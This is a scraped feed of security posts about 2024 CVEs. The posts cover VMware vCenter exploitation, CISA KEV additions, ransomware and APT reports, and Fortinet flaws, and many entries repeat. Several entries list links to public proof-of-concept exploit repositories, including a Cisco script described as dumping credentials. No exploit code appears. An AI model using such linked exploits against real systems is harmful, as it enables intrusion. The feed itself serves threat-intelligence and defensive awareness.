##VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/ #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware
##VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/ #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware
##VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/ #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware
##VMware Discloses Exploitation of Hard-to-Fix vCenter Server Flaw https://www.securityweek.com/vmware-discloses-exploitation-of-hard-to-fix-vcenter-server-flaw/ #Malware&Threats #Vulnerabilities #CVE202438812 #CVE202438813 #MatrixCUp #VMware
##VMware security advisory 11/18 update: VMSA-2024-0019
VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813.
cc: @cR0w @ntkramer @dreadpir8robots @campuscodi
#vmware #vcenter #vulnerability #cve #CVE_2024_38812 #CVE_2024_38813 #eitw #activeexploitation
##VMware security advisory 11/18 update: VMSA-2024-0019
VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813.
cc: @cR0w @ntkramer @dreadpir8robots @campuscodi
#vmware #vcenter #vulnerability #cve #CVE_2024_38812 #CVE_2024_38813 #eitw #activeexploitation
###CISA has updated the KEV catalogue. I wonder how much longer we will be able to do this.
- CVE-2024-38812: #VMware vCenter Server Heap-Based Buffer Overflow Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-38812
- CVE-2024-38813: VMware vCenter Server Privilege Escalation Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-38813
More:
- 2024 CWE Top 25 Most Dangerous Software Weaknesses https://www.cisa.gov/news-events/alerts/2024/11/20/2024-cwe-top-25-most-dangerous-software-weaknesses
- USDA Releases Success Story Detailing the Implementation of Phishing-Resistant Multi-Factor Authentication https://www.cisa.gov/news-events/alerts/2024/11/20/usda-releases-success-story-detailing-implementation-phishing-resistant-multi-factor-authentication @cisacyber #cybersecurity #infosec
##CVE ID: CVE-2024-38812
Vendor: VMware
Product: vCenter Server
Date Added: 2024-11-20
Vulnerability: VMware vCenter Server Heap-Based Buffer Overflow Vulnerability
Notes: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968 ; https://nvd.nist.gov/vuln/detail/CVE-2024-38812
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-38812
CISA: CISA Adds Two Known Exploited Vulnerabilities to Catalog
Hot off the press!
#cisa #kev #cisakev #knownexploitedvulnerabilitiescatalog #vmware #vcenter #vulnerability #eitw #activeexploitation #infosec #cybersecurity
###CISA has updated the KEV catalogue. I wonder how much longer we will be able to do this.
- CVE-2024-38812: #VMware vCenter Server Heap-Based Buffer Overflow Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-38812
- CVE-2024-38813: VMware vCenter Server Privilege Escalation Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-38813
More:
- 2024 CWE Top 25 Most Dangerous Software Weaknesses https://www.cisa.gov/news-events/alerts/2024/11/20/2024-cwe-top-25-most-dangerous-software-weaknesses
- USDA Releases Success Story Detailing the Implementation of Phishing-Resistant Multi-Factor Authentication https://www.cisa.gov/news-events/alerts/2024/11/20/usda-releases-success-story-detailing-implementation-phishing-resistant-multi-factor-authentication @cisacyber #cybersecurity #infosec
##CVE ID: CVE-2024-38812
Vendor: VMware
Product: vCenter Server
Date Added: 2024-11-20
Vulnerability: VMware vCenter Server Heap-Based Buffer Overflow Vulnerability
Notes: https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968 ; https://nvd.nist.gov/vuln/detail/CVE-2024-38812
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-38812
CISA: CISA Adds Two Known Exploited Vulnerabilities to Catalog
Hot off the press!
#cisa #kev #cisakev #knownexploitedvulnerabilitiescatalog #vmware #vcenter #vulnerability #eitw #activeexploitation #infosec #cybersecurity
##And there's the advisory update, admittedly later than I was expecting: #VMware vCenter Server / Cloud Foundation CVE-2024-38812 and CVE-2024-38813 officially exploited in the wild, per Broadcom. https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968
##Broadcom: #VMware vCenter Server updates address critical heap-overflow and privilege escalation vulnerabilities (CVE-2024-38812, CVE-2024-38813) https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968
VMSA-2024-0019: Questions & Answers https://github.com/vmware/vcf-security-and-compliance-guidelines/blob/main/security-advisories/vmsa-2024-0019/README.md @vmwaresrc
More: Critical RCE bug in VMware vCenter Server now exploited in attacks https://www.bleepingcomputer.com/news/security/critical-rce-bug-in-vmware-vcenter-server-now-exploited-in-attacks/ @BleepingComputer @serghei #cybersecurity #infosec
##@neurovagrant VMware by Broadcom confirmed that exploitation has occurred in the wild for CVE-2024-38812 and CVE-2024-38813. https://support.broadcom.com/web/ecx/support-content-notification/-/external/content/SecurityAdvisories/0/24968
THE HITS JUST KEEP COMING
##updated 2024-09-30T13:35:28
1 posts
Jenkins Security Advisory 2024-11-13
No mention of exploitation.
##updated 2024-09-20T22:07:52
1 posts
1 repos
🚨CVE-2024-47062 PoC; SQL Injection Vulnerability in Navidrome
##updated 2024-09-16T15:29:27
1 posts
1 repos
Ruby SAML CVE-2024-45409: As bad as it gets and hiding in plain sight https://workos.com/blog/ruby-saml-cve-2024-45409
##updated 2024-09-09T18:30:30
1 posts
2 repos
Sophos News: VEEAM exploit seen used again with a new ransomware: "Frag"
Sophos X-Ops observed threat activity cluster "STAC 5881" exploiting CVE-2024-40711 to deploy a new ransomware called Frag. They previously deployed Fog or Akira ransomware. No indicators shared.
Reference: CVE-2024-40711 (9.8 critical, disclosed 04 September 2024 by Veeam, has Proof of Concept and vulnerability details, added to CISA KEV Catalog 17 October 2024) Veeam Backup and Replication Deserialization Vulnerability
#akira #fog #ransomware #stac5881 #cybercrime #CVE_2024_40711 #veeam #threatintel #cyberthreatintelligence #cybersecurity #infosec #CTI
##updated 2024-09-03T03:30:40
2 posts
1 repos
Sekoia: Helldown Ransomware: an overview of this emerging threat
Sekoia offers a threat actor profile for Helldown ransomware, a relatively new threat actor group performing double extortion (with a data leak site). A potential Zyxel vulnerability that Helldown exploits is CVE-2024-42057 (8.1 high, disclosed 03 September 2024) Zyxel firewall command injection vulnerability. They provide a technical analysis (dynamic and static) of both the Windows and Linux variants of Helldown ransomware. Indicators of compromise are listed.
#Helldown #ransomware #cybercrime #CVE_2024_42057 #zyxel #vulnerability #malwareanalysis #IOC #threatintel #infosec #cybersecurity #cyberthreatintelligence
##Sekoia: Helldown Ransomware: an overview of this emerging threat
Sekoia offers a threat actor profile for Helldown ransomware, a relatively new threat actor group performing double extortion (with a data leak site). A potential Zyxel vulnerability that Helldown exploits is CVE-2024-42057 (8.1 high, disclosed 03 September 2024) Zyxel firewall command injection vulnerability. They provide a technical analysis (dynamic and static) of both the Windows and Linux variants of Helldown ransomware. Indicators of compromise are listed.
#Helldown #ransomware #cybercrime #CVE_2024_42057 #zyxel #vulnerability #malwareanalysis #IOC #threatintel #infosec #cybersecurity #cyberthreatintelligence
##updated 2024-08-27T18:31:36
2 posts
1 repos
Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)
#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI
##Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)
#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI
##updated 2024-08-01T15:33:03
1 posts
1 repos
@valorin I found this one a pretty good summary: https://blog.nollium.com/cve-2024-50340-remote-access-to-symfony-profiler-via-injected-arguments-d2f14b4f6ad7 although I believe Laravel applications were only impacted for the application environment name (production/staging etc.) and the debug flag was Symfony specific.
##updated 2024-07-24T18:32:16
1 posts
26 repos
https://github.com/SyFi/cve-2017-0199
https://github.com/TheCyberWatchers/CVE-2017-0199-v5.0
https://github.com/bhdresh/CVE-2017-0199
https://github.com/SwordSheath/CVE-2017-8570
https://github.com/ryhanson/CVE-2017-0199
https://github.com/jacobsoo/RTF-Cleaner
https://github.com/joke998/Cve-2017-0199-
https://github.com/kash-123/CVE-2017-0199
https://github.com/kn0wm4d/htattack
https://github.com/Sunqiz/CVE-2017-0199-reprofuction
https://github.com/BRAINIAC22/CVE-2017-0199
https://github.com/Winter3un/cve_2017_0199
https://github.com/n1shant-sinha/CVE-2017-0199
https://github.com/joke998/Cve-2017-0199
https://github.com/herbiezimmerman/2017-11-17-Maldoc-Using-CVE-2017-0199
https://github.com/viethdgit/CVE-2017-0199
https://github.com/haibara3839/CVE-2017-0199-master
https://github.com/Phantomlancer123/CVE-2017-0199
https://github.com/NotAwful/CVE-2017-0199-Fix
https://github.com/mzakyz666/PoC-CVE-2017-0199
https://github.com/Exploit-install/CVE-2017-0199
https://github.com/nicpenning/RTF-Cleaner
https://github.com/sUbc0ol/Microsoft-Word-CVE-2017-0199-
https://github.com/likekabin/CVE-2017-0199
Fortinet: New Campaign Uses Remcos RAT to Exploit Victims
A phishing campaign is exploiting CVE-2017-0199 (7.8 high) Microsoft Office and WordPad Remote Code Execution Vulnerability to spread Remcos RAT. Indicators of compromise provided.
#remcosRAT #CVE_2017_0199 #IOC #threatintel #infosec #cybersecurity #cyberthreatintelligence #cti
##updated 2024-06-21T21:35:02
1 posts
1 repos
🚨CVE-2024-4577 RCE Exploit; PHP CGI Argument Injection
https://darkwebinformer.com/cve-2024-4577-rce-exploit-php-cgi-argument-injection/
##updated 2024-06-20T18:35:10
2 posts
2 repos
🚨CVE-2024-35250 PoC for the Untrusted Pointer Dereference in the ks.sys driver
##🚨CVE-2024-35250 PoC for the Untrusted Pointer Dereference in the ks.sys driver
##updated 2024-06-11T18:30:56
1 posts
DEF CON 32 – Outlook Unleashing RCE Chaos CVE 2024 30103 – Source: securityboulevard.com https://ciso2ciso.com/def-con-32-outlook-unleashing-rce-chaos-cve-2024-30103-source-securityboulevard-com/ #rssfeedpostgeneratorecho #SecurityBloggersNetwork #cybersecurityeducation #InfosecurityEducation #CyberSecurityNews #SecurityBoulevard #DEFCONConference #DEFCON32
##updated 2024-05-16T21:31:58
1 posts
1 repos
Windows DWM Core Library Elevation of Privilege Vulnerability (CVE-2024-30051) https://www.coresecurity.com/core-labs/articles/windows-dwm-core-library-elevation-privilege-vulnerability-cve-2024-30051
##updated 2024-05-16T12:30:29
1 posts
1 repos
ClearSky: CVE-2024-43451: A New Zero-Day Vulnerability Exploited in the wild
Reference: CVE-2024-43451 (6.5 medium, disclosed 12 November 2024 by Microsoft as an exploited zero-day, added to CISA KEV Catalog same day) NTLM Hash Disclosure Spoofing Vulnerability
ClearSky reports that CVE-2024-43451 was exploited in the wild against Ukrainian entities when it was discovered in June 2024. A compromised Ukrainian government server sent phishing emails which contained a malicious URL file. Any interaction triggers the vulnerability which establishes a connection with the attacker's server and downloads further malicious files like SparkRAT. The campaign is attributed to the suspected Russian threat actor group UAC-0194. See the 14 page PDF report. Indicators of compromise are listed inside.
#CVE_2024_43451 #vulnerability #eitw #activeexploitation #kev #uac0194 #russia #russiaukrainewar #ukraine #cyberespionage #cyberthreatintelligence #threatintel #cybersecurity #infosec #CTI #IOC #sparkRAT
##updated 2024-04-29T05:02:31
1 posts
1 repos
@krypt3ia No kidding. The impact hasn't been as bad, but the communication is so much worse than even the CVE-2024-3400 shitshow. Definitely feels like something's up. Like someone else is using the same vuln and doesn't want access to get burned yet, IDK.
##updated 2024-04-11T21:19:47
1 posts
New blog post dives deep into a lesser-known macOS attack surface, revealing over 10 fresh sandbox escape vulnerabilities, including CVE-2023-27944, CVE-2023-32414, and CVE-2024-27864. The overlooked XPC services in system frameworks have opened up critical bypass paths for sandbox and SIP restrictions.
https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/
##updated 2024-04-09T18:30:35
2 posts
1 repos
@cR0w This is from a client lol, AlienVault is flagging 127.0.0.0/8 connections as cve-2024-26229 IOCs 🙄
##@cR0w This is from a client lol, AlienVault is flagging 127.0.0.0/8 connections as cve-2024-26229 IOCs 🙄
##updated 2024-04-04T06:17:12
1 posts
15 repos
https://github.com/fox-it/citrix-netscaler-triage
https://github.com/BishopFox/CVE-2023-3519
https://github.com/mandiant/citrix-ioc-scanner-cve-2023-3519
https://github.com/Mohammaddvd/CVE-2023-3519
https://github.com/SalehLardhi/CVE-2023-3519
https://github.com/JonaNeidhart/CVE-2023-3519-BackdoorCheck
https://github.com/passwa11/CVE-2023-3519
https://github.com/getdrive/PoC
https://github.com/securekomodo/citrixInspector
https://github.com/mr-r3b00t/CVE-2023-3519
https://github.com/rwincey/cve-2023-3519
https://github.com/Chocapikk/CVE-2023-3519
https://github.com/d0rb/CVE-2023-3519
https://github.com/telekom-security/cve-2023-3519-citrix-scanner
Surge in exploits of zero-day vulnerabilities is ‘new normal’ warns Five Eyes alliance
In a co-authored advisory, the agencies list the top 15 most routinely exploited vulnerabilities of 2023, with CVE-2023-3519 — an issue affecting...
🔗️ [Therecord] https://link.is.it/t2ct9p
##updated 2024-04-04T05:08:19
1 posts
New blog post dives deep into a lesser-known macOS attack surface, revealing over 10 fresh sandbox escape vulnerabilities, including CVE-2023-27944, CVE-2023-32414, and CVE-2024-27864. The overlooked XPC services in system frameworks have opened up critical bypass paths for sandbox and SIP restrictions.
https://jhftss.github.io/A-New-Era-of-macOS-Sandbox-Escapes/
##updated 2024-04-04T04:45:33
2 posts
1 repos
Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)
#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI
##Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)
#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI
##updated 2024-03-18T12:31:54
2 posts
4 repos
https://github.com/Praison001/CVE-2024-20767-Adobe-ColdFusion
https://github.com/m-cetin/CVE-2024-20767
Remediation for CVE-2024-20767 and CVE-2024-21216 Potential Exploitable Bugs https://blog.securelayer7.net/coldfusion-path-traversal-and-weblogic-unauthenticated-rce-remediation/
##Remediation for CVE-2024-20767 and CVE-2024-21216 Potential Exploitable Bugs https://blog.securelayer7.net/coldfusion-path-traversal-and-weblogic-unauthenticated-rce-remediation/
##updated 2024-03-07T18:30:26
1 posts
1 repos
So AIX 7.2 and 7.3 are vulnerable to CVE-2023-36328 in tcl, a CVSSv3 9.8 RCE per IBM that was initially published over a year ago, and the bulletin didn't come out from IBM until last week? https://www.ibm.com/support/pages/security-bulletin-aix-vulnerable-arbitrary-code-execution-cve-2023-36328-due-tcl
##updated 2024-03-02T05:06:50
1 posts
1 repos
CVE-2023-4911 – Looney Tunables ( https://nfsec.pl/security/6542 ) #linux #glibc #security #twittermigration
##updated 2024-02-21T18:31:06
4 posts
2 repos
CISA Adds Three Critical Vulnerabilities to the Known Exploited Vulnerabilities Catalog
: CISA adds CVE-2024-1212, CVE-2024-0012, and CVE-2024-9474 to the Known Exploited Vulnerabilities Catalog (KEV).
🔗️ [Cyble] https://link.is.it/so5jib
###CISA has updated the KEV catalogue:
CVE-2024-1212: Progress Kemp LoadMaster OS Command Injection Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-1212
- CVE-2024-0012: Palo Alto Networks PAN-OS Management Interface Authentication Bypass Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-0012
- CVE-2024-9474: Palo Alto Networks PAN-OS Management Interface OS Command Injection Vulnerability https://www.cve.org/CVERecord?id=CVE-2024-9474 @cisacyber #cybersecurity #infosec #PaloAlto
##CVE ID: CVE-2024-1212
Vendor: Progress
Product: Kemp LoadMaster
Date Added: 2024-11-18
Vulnerability: Progress Kemp LoadMaster OS Command Injection Vulnerability
Notes: https://community.progress.com/s/article/Release-Notice-LMOS-7-2-59-2-7-2-54-8-7-2-48-10-CVE-2024-1212 ; https://nvd.nist.gov/vuln/detail/CVE-2024-1212
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2024-1212
CISA: CISA Adds Three Known Exploited Vulnerabilities to Catalog
So hot off the press that it's not even live yet!
#cisa #cisakev #kev #knownexploitedvulnerabilitiescatalog #vulnerability #cve #CVE_2024_0012 #CVE_2024_9474 #paloaltonetworks #panos #zeroday #eitw #activeexploitation #progress #kemp #loadmaster
##updated 2024-02-15T15:30:37
5 posts
1 repos
What a wonderful writeup of the #fortinet vulnerabilities found by watchtowr labs. It's insightful and entertaining :) #cybersecurity #security #infosec
https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/
##lol, at this point you should just throw your fortinet devices into a landfill. https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/
##FortiJump Higher details are out. Even with the patch installed, apparently you can get RCE on FortiManager using a FortiGate it manages. https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/
##WatchTowr: Hop-Skip-FortiJump-FortiJump-Higher - Fortinet FortiManager CVE-2024-47575 https://labs.watchtowr.com/hop-skip-fortijump-fortijumphigher-cve-2024-23113-cve-2024-47575/ #cybersecurity #infosec #Fortinet
##watchTowr: Hop-Skip-FortiJump-FortiJump-Higher - Fortinet FortiManager CVE-2024-47575
Reference: CVE-2024-47575 (9.8 critical, disclosed 23 October 2024 by Fortinet, noted earlier on 13 October by @GossiTheDog on Mastodon, added to CISA KEV Catalog 23 October, reported by Mandiant to be #eitw since June) Fortinet FortiManager Missing Authentication Vulnerability
watchTowr is disclosing a separate and unidentified privilege escalation vulnerability linked to CVE-2024-47575 due to the original #FortiJump vulnerability currently being under mass exploitation. They also warn that the published IoC, while helpful, may not cover all attacks: an unregistered device being added to the system, could be easily bypassed, and exploitation could occur without generating any log noise at all.
#CVE_2024_47575 #vulnerability #fortinet #CVE #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI
##updated 2024-02-03T05:07:29
2 posts
1 repos
Trend Micro: Inside Water Barghest's Rapid Exploit-to-Market Strategy for IoT Devices
Trend Micro does a piss poor job of providing useful threat intelligence in this article. Water Barghest is supposedly a financially-motivated APT without a country attribution that's been active since 2018. They also say that Water Barghest exploits vulnerabilities without once identifying a CVE ID. Over 20,000 Internet of Things (IoT) devices are part of a proxy botnet, using Ngioweb malware to connect to C2 servers. They also assess that Water Barghest is the threat actor that massively exploited Cisco IOS XE as a zero-day. It's not explicitly stated (since Trend Micro didn't include any CVE IDs) but it's assumed to be both CVE-2023-20198 and CVE-2023-20273 because they were chained together. Indicators of compromise and Yara rules provided.
#WaterBarghest #IOC #yara #CVE_2023_20198 #CVE_2023_20273 #zeroday #iot #ngioweb #botnet #cybercrime #proxybotnet #vulnerability #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec
##Trend Micro: Inside Water Barghest's Rapid Exploit-to-Market Strategy for IoT Devices
Trend Micro does a piss poor job of providing useful threat intelligence in this article. Water Barghest is supposedly a financially-motivated APT without a country attribution that's been active since 2018. They also say that Water Barghest exploits vulnerabilities without once identifying a CVE ID. Over 20,000 Internet of Things (IoT) devices are part of a proxy botnet, using Ngioweb malware to connect to C2 servers. They also assess that Water Barghest is the threat actor that massively exploited Cisco IOS XE as a zero-day. It's not explicitly stated (since Trend Micro didn't include any CVE IDs) but it's assumed to be both CVE-2023-20198 and CVE-2023-20273 because they were chained together. Indicators of compromise and Yara rules provided.
#WaterBarghest #IOC #yara #CVE_2023_20198 #CVE_2023_20273 #zeroday #iot #ngioweb #botnet #cybercrime #proxybotnet #vulnerability #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec
##updated 2024-02-03T05:06:23
2 posts
1 repos
Trend Micro: Inside Water Barghest's Rapid Exploit-to-Market Strategy for IoT Devices
Trend Micro does a piss poor job of providing useful threat intelligence in this article. Water Barghest is supposedly a financially-motivated APT without a country attribution that's been active since 2018. They also say that Water Barghest exploits vulnerabilities without once identifying a CVE ID. Over 20,000 Internet of Things (IoT) devices are part of a proxy botnet, using Ngioweb malware to connect to C2 servers. They also assess that Water Barghest is the threat actor that massively exploited Cisco IOS XE as a zero-day. It's not explicitly stated (since Trend Micro didn't include any CVE IDs) but it's assumed to be both CVE-2023-20198 and CVE-2023-20273 because they were chained together. Indicators of compromise and Yara rules provided.
#WaterBarghest #IOC #yara #CVE_2023_20198 #CVE_2023_20273 #zeroday #iot #ngioweb #botnet #cybercrime #proxybotnet #vulnerability #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec
##Trend Micro: Inside Water Barghest's Rapid Exploit-to-Market Strategy for IoT Devices
Trend Micro does a piss poor job of providing useful threat intelligence in this article. Water Barghest is supposedly a financially-motivated APT without a country attribution that's been active since 2018. They also say that Water Barghest exploits vulnerabilities without once identifying a CVE ID. Over 20,000 Internet of Things (IoT) devices are part of a proxy botnet, using Ngioweb malware to connect to C2 servers. They also assess that Water Barghest is the threat actor that massively exploited Cisco IOS XE as a zero-day. It's not explicitly stated (since Trend Micro didn't include any CVE IDs) but it's assumed to be both CVE-2023-20198 and CVE-2023-20273 because they were chained together. Indicators of compromise and Yara rules provided.
#WaterBarghest #IOC #yara #CVE_2023_20198 #CVE_2023_20273 #zeroday #iot #ngioweb #botnet #cybercrime #proxybotnet #vulnerability #eitw #activeexploitation #threatintel #threatintel #cyberthreatintelligence #CTI #cybersecurity #infosec
##updated 2023-08-16T18:30:19
1 posts
Also being sprayed - dumps memory on AnyConnect including creds https://github.com/GossiTheDog/Exploits/blob/main/Cisco-CVE-2020-3259.sh
##updated 2023-08-08T15:31:21
4 posts
1 repos
Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)
#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI
##Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)
#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI
##Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)
#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI
##Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)
#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI
##updated 2023-06-05T05:00:42
1 posts
9 repos
https://github.com/gassara-kys/CVE-2021-40438
https://github.com/xiaojiangxl/CVE-2021-40438
https://github.com/sergiovks/CVE-2021-40438-Apache-2.4.48-SSRF-exploit
https://github.com/cyberark/PwnKit-Hunter
https://github.com/pisut4152/Sigma-Rule-for-CVE-2021-40438-exploitation-attempt
https://github.com/Cappricio-Securities/CVE-2021-40438
https://github.com/Kashkovsky/CVE-2021-40438
CVE-2021-4043 (5.5 medium) Motion Spell GPAC Null Pointer Dereference Vulnerability is no longer on the KEV Catalog.
##updated 2023-03-23T18:30:31
1 posts
15 repos
https://github.com/darkerego/Nostromo_Python3
https://github.com/FredBrave/CVE-2019-16278-Nostromo-1.9.6-RCE
https://github.com/ianxtianxt/CVE-2019-16278
https://github.com/cancela24/CVE-2019-16278-Nostromo-1.9.6-RCE
https://github.com/jas502n/CVE-2019-16278
https://github.com/NHPT/CVE-2019-16278
https://github.com/n3rdh4x0r/CVE-2019-16278
https://github.com/aN0mad/CVE-2019-16278-Nostromo_1.9.6-RCE
https://github.com/sunnet-cyber/CVE2019_16278
https://github.com/imjdl/CVE-2019-16278-PoC
https://github.com/alexander-fernandes/CVE-2019-16278
https://github.com/Kr0ff/cve-2019-16278
https://github.com/keshiba/cve-2019-16278
We (GreyNoise) have coverage for 3 of the 4 CVEs into today's CISA KEV Drop:
- ✅ CVE-2019-16278
- ✅ CVE-2024-51567
- ✅ CVE-2024-5910
- ❌ CVE-2024-43093
Hit up viz.greynoise.io for deets + real/useful/timely blocklists.
CVE-2024-43093 is client-side, hence no coverage.
##updated 2023-02-02T05:01:14
2 posts
1 repos
Tenable: Volt Typhoon: U.S. Critical Infrastructure Targeted by State-Sponsored Actors
Tenable explains the tactics, techniques and procedures of the Chinese state-sponsored APT Volt Typhoon. This includes initial access methods, abuse of SOHO devices, living-off-the-land (lotl) tactics, known vulnerabilities exploited, and which of those vulnerabilities have public proofs of concept. Since it's a Tenable blog post, they provide Tenable plugins. TTPs are listed in a table and mapped to MITRE ATT&CK. Resources are listed, but don't include reporting from companies like Lumen's Black Lotus Labs (KV-botnet, post-botnet update, or the Versa Director zero-day exploitation)
#volttyphoon #china #cyberespionage #CVE_2021_27860 #CVE_2021_40539 #CVE_2022_42475 #CVE_2023_27997 #CVE_2024_39717 #threatintel #infosec #cybersecurity #cyberthreatintelligence #CTI
